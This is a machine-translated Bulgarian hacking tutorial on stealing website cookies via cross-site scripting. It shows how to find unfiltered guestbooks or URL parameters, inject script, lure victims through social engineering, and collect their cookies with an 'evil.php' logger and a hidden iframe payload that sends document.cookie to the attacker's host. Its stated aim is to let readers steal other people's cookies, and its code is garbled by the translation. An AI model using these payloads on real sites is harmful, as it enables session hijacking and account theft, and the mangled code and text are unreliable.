Cookie Кражбата за забавление и печалба
Предложени Четене ресурси (без разходи!)
| |
0 × 10 Въведение
XSS (Cross Site Scripting) обикновено се критикуват. Тя се казва, че XSS мога да направя нищо, всъщност. Всичко това може да направите, е да направи хубаво малко Сигнал кутия на вашия екран, казвам ти бисквитки. Това е погрешно предположение. Въпреки, че тя може да бъде малко трудно, може да използвате XSS да открадне потребителя бисквитки. Cookies се използват за съхранение на ценна информация, като потребителско име, парола, IP адреса и много повече. Този настойнически е насочена към обучението ти Cookie Кражбата, а до края на този текст файл, трябва да бъде в състояние самостоятелно да крадат на други хора бисквитки.
DISCLAIMER:
Този текст е за образователни цели. Авторът не носи отговорност за каквито и да е щети, които възникват от четеца за след този текст или дори да се учим от нея.
################################################## # # # #
0 × 20 Намиране уязвимостта
Първо, вие трябва да намерите XSS уязвимост. Това може да се окаже малко предизвикателство, но и за сайтове с по-ниски за сигурност, това е много лесно. Например, има ли си видял един от тези guestbooks? Някои от тях не е правилно конфигуриран да филтрира от вас текст инча Какво означава това? Това означава, че можете да манипулират на HTML на страницата и се инжектира JavaScript код! Добре, нека да започнем с нещо просто. Вид това в книгата за гости:
<script type="text/javascript">
Сигналът (document.cookie)
</ скрипта>
Добре, сега това е направено, натиснете ENTER. Ако не е правилно Мнения проверите своя принос, това означава, че трябва да могат да видят вашата бисквитка изниквам! Разбира се, ако ви вид, че и той не работи, му вероятно ще бъде малко неудобно, особено когато сайтът Admin taunts Вас. Както и да тествате дали една книга за гости правилно филтри своя принос, въведете нещо като "Вие, момчета <b> смучете </ B>." И вижте дали на "смучат" идва в получер текст.
Ако е така, на книга за гости е може би не е конфигуриран да филтрира въвеждане. Въпреки това, XSS не се ограничава само до гост книги. Места, в които можете да промените, като HTML страница, която използва URL параметър за показване на изображение или текст, може да се инжектира със здравословна доза
от XSS. Например, URL адресът е този:
Сайт / bla.php? каквото = lol.gif
Сега, си представя какво е HTML за изображението ще бъде като ...
<img src="lol.gif">
И те се добави "> в гърба, което означава, че ние можем да направим това:
(начало URL тук)
Сайт / bla.php? каквото = lol.gif "> <script type="text/javascript">
Сигналът (document.cookie) </ скрипта> <един href = "тест
(Края на сайт тук)
и сте готови!
################################################## # # # #
0 × 30 Отваряне на вратата
(Този раздел е само за тези, които избра URL като XSS инжекция точка, между другото)
Добре, всичко това е приятно и хубава, но както казах в началото, хората критикуват XSS, тъй като може да работи само във вашия браузър.
Това означава, че за да получите враг паролата, трябва да отида да седнат, за вход, и отидете в инжектиране страница, след което ви покаже предупреждение кутия. Прости ми език, но като HELL, че ще ходи на работа. Трябва да си умен. Трябва да подвежда под тях става в страницата, а след това се използва техниката ще обясня по-късно точка, за да им бисквитки.
Това tricking Техниката е нещо, известно като социално инженерство. Не се притеснявай, то не е
сложни изобщо. Всичко, което трябва да направите, е глупак ти приятелка. Например, ако страницата, която fooling го отиваш в е книга за гости, след което можете да кажете нещо като "Погледни в тази книга за гости готино! (въведете URL тук) "Бъдете Creative. Не го прави още обаче, ние все още имаме последната част от подготовката да отида ...
################################################## # # # #
0 × 40 Кражбата
Но след като luser отива на мястото, какво правиш тогава? "Хей, кажете ми, че в тази информация за подозрителни търси текстовото поле, моля?" Да прав.
Това е мястото, където на PHP код идва инча Получете безплатна уеб-домакин, който поддържа PHP (за предпочитане нещо като www.t35.com, въпреки че ще бъде нарушаване на правилата в тяхната TOS ...) и да направи нов файл. В новия файл напишете това:
<html>
<body>
<? PHP
[ 'stuff' ] . “\n” ; $ неща = $ _GET [ 'нещата']. "\ N";
fopen ( ‘evil.txt’ , ‘ab’ ); $ FH = fopen ( "evil.txt", "АБ");
$fh , $stuff ); fwrite ($ FH, $ нещо);
$fh ); fclose ($ FH);
?>
</ тялото>
</ HTML>
Wheee това беше забавно. Добре, запазете го като evil.php. Сега правят празен текстов файл на име evil.txt и вида някои неща в нея, като например "Cookie Stealer Phile (Newline тук)". Добре, сега ще трябва да промените скрипта, който сте поставени в неравностойно положение сайт. Променете го
<IFRAME SRC="javascript:window.location=%22(site)/evil.php?stuff=%22+document.cookie" height="1" width="1" frameborder="0"> </ IFRAME>
Разбира се, промени (сайт) в сайта си и сте готови да вървим! Всеки път, когато нов luser стане привлечени в капана му бисквитки, ще бъде добавен към evil.txt!
################################################## # # # #
Популярност: 4% [?]
Свързани пунктове:
- Създайте CookieLogger и Рязка рана всеки профил
- Рязка рана Orkut профил
- Как да проникна в форумите
- Google Хром Пропуски списък
Радва тази статия? Абонирайте се за Хакерство истини и да се актуализира ежедневно за нови готино сайтове и програми на вашия имейл безплатно. 
Забележка: Ако имате някакви заявките, свързани с по-горе член моля Пост към Подкрепа форум.
Оставете вашия отговор!